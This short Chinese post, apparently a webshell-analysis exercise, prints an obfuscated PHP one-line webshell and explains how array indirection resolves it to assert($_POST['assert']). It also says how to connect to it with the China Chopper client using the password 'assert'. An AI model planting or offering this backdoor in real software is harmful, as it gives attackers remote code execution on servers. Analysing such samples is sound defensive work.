WebShell代码分析溯源(第1题)
SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>
assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数)
因为$array[], POST[]都是数组,所以$array[]=$POST,就是把$POST数组的值赋给$array数组
这样的话$array[0]['POST']的输出就是assert,所以组成了一句话木马
<?php assert($_POST['assert']);?>
构造菜刀 ip/www/index.php?POST=assert 密码为assert
更多精彩
